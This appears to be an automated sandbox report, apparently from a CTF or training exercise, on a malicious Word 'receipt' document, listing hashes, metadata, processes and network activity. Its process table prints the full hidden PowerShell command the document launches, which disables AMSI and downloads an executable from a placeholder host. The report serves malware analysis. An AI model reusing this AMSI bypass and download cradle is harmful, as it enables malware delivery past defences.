File name: | Your_Receipt_1146.doc |
Full analysis: | https://app.any.run/tasks/3e65e6a3-f9f3-4791-961e-43866f027c70 |
Verdict: | Malicious activity |
Analysis date: | March 30, 2020, 20:16:27 |
OS: | Windows 10 Professional (build: 16299, 64 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: Harold, Template: Normal.dotm, Last Saved By: Harold Harepus, Revision Number: 2, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Mar 24 23:49:00 2020, Last Saved Time/Date: Tue Mar 24 23:49:00 2020, Number of Pages: 1, Number of Words: 0, Number of Characters: 3, Security: 0 |
MD5: | 28BAB9F6E7079EE4E520E4B65397022F |
SHA1: | BE336692D15BCBC4BC8D1FEC5CA3F2F61E1AF823 |
SHA256: | FA55FFCFA142A3A999F3913A9EDD948EA7ED8464DDC12EB748E79DB614929E4E |
SSDEEP: | 3072:MBdIuBkiY2v7cIi/OtMMkCk3SSXF/0M7KB3wy5edEA/oiDPzOc1nVQ2au:UfWiBcDCPyR0M+CSedEA/oi |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
Title: | - |
---|---|
Subject: | - |
Author: | Harold |
Keywords: | - |
Comments: | - |
Template: | Normal.dotm |
LastModifiedBy: | Harold Harepus |
RevisionNumber: | 2 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2020:03:24 23:49:00 |
ModifyDate: | 2020:03:24 23:49:00 |
Pages: | 1 |
Words: | - |
Characters: | 3 |
Security: | None |
CodePage: | Windows Latin 1 (Western European) |
Company: | - |
Bytes: | 143020 |
Lines: | 1 |
Paragraphs: | 1 |
CharCountWithSpaces: | 3 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: |
|
CompObjUserTypeLen: | 32 |
CompObjUserType: | Microsoft Word 97-2003 Document |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
5372 | "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\admin\Desktop\Your_Receipt_1146.doc" /o "" | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | explorer.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Exit code: 0 Version: 16.0.12026.20264 | ||||
4332 | powershell.exe -WindowStyle Hidden -noprofile [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true); If (test-path $env:APPDATA + '\C:\Windows\System32\calc.exe') {Remove-Item $env:APPDATA + '\C:\Windows\System32\calc.exe'}; $OEKQD = New-Object System.Net.WebClient; $OEKQD.Headers['User-Agent'] = 'EGG{adfcfdb9ef305f26ab51303294da6afc }'; $OEKQD.DownloadFile('https://even_more_shady.looking.domain.lab/to/get/some/malware.exe', $env:APPDATA + '\C:\Windows\System32\calc.exe'); Stop-Process -Id $Pid -Force | C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 4294967295 Version: 10.0.16299.15 (WinBuild.160101.0800) | ||||
5516 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\WINDOWS\system32\conhost.exe | powershell.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.16299.15 (WinBuild.160101.0800) |
PID | Process | Filename | Type | |
---|---|---|---|---|
5372 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Z4G5H3E228JCPHD7DCVE.temp | — | |
MD5:— | SHA256:— | |||
5372 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\00SD1B3NHG4V2E0GSYD6.temp | — | |
MD5:— | SHA256:— | |||
5372 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~DFC0BFB3992C658739.TMP | — | |
MD5:— | SHA256:— | |||
5372 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{3A08CB9E-59E2-4D5A-A097-30F67D5C2E6C}.tmp | — | |
MD5:— | SHA256:— | |||
5372 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{3F88E98A-51C1-40E9-87A0-29785A3FAABE}.tmp | — | |
MD5:— | SHA256:— | |||
5372 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Office\OTele\winword.exe.db-shm | — | |
MD5:— | SHA256:— | |||
5372 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Office\OTele\winword.exe.db-wal | — | |
MD5:— | SHA256:— | |||
5372 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRF{53403A1B-DF2A-45A3-816A-92EC18E8FC0A}.tmp | — | |
MD5:— | SHA256:— | |||
4332 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_lhhywp4w.vtk.ps1 | text | |
MD5:A99C0FDF62E2F3277A6AFC9CD8078CAB | SHA256:CDC0E4138935FD12754F6626984A1CEA6E1E3FAD98A85D8C7D450209E0D78307 | |||
5372 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\.ses | text | |
MD5:77468879D23F78437CE2EE4A90BA87EE | SHA256:A92EA4ACC88632680BF533A1300DB780AA6BAA523D8B343C71C0B47D118889F1 |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
5372 | WINWORD.EXE | 13.107.3.128:443 | config.edge.skype.com | Microsoft Corporation | US | whitelisted |
5372 | WINWORD.EXE | 52.114.77.33:443 | self.events.data.microsoft.com | Microsoft Corporation | IE | suspicious |
756 | svchost.exe | 20.191.48.196:443 | settings-win-ppe.data.microsoft.com | Microsoft Corporation | US | unknown |
Domain | IP | Reputation |
---|---|---|
config.edge.skype.com |
| whitelisted |
self.events.data.microsoft.com |
| whitelisted |
settings-win-ppe.data.microsoft.com |
| whitelisted |